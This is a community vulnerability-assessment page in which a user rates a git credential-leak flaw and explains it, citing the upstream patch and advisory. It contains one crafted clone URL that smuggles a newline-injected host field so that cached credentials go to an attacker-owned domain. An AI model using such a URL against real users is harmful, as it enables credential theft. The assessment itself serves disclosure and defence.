Green-m (7)

Last Login: October 14, 2020
Assessments
1
Score
7

Green-m's Latest (1) Contributions

Sort by:
Filter by:
6
Ratings
  • Attacker Value
    Low
  • Exploitability
    High
Easy to weaponizeGives privileged accessRequires user interactionVulnerable in uncommon configuration
Technical Analysis

The exploitability is very easy

This vuln is just a CRLF injection in my opinion.

You could offer the URL like https://one.example.com?%0ahost=two.example.com/ so that the credential would be sent to two.example.com which the attacker owns.

The value is limited

I guess there are some prerequisites for attack :

  • A subdomain name, has the same main domain name as the target.

  • The victim store or caches the credentials (It’s not the default behavior).

  • May need user interactions. The exploit usually occurred when the user runs git clone <URL>.

That’s why I prefer the value for the attacker is low.

Another interesting scenario

This vuln probably affected the App and service based on git, like GitLab(Not include GitLab).

These services may allow users to import or remote clone some repo, this vuln would occur.

Original patch

https://github.com/git/git/commit/9a6bbee8006c24b46a85d29e7b38cfa79e9ab21b

Fix and walkaround

See https://github.com/git/git/security/advisories/GHSA-qm7j-c969-7j4q

Been my first comment in this awesome attackerkb community, welcome to discuss and helpful advice.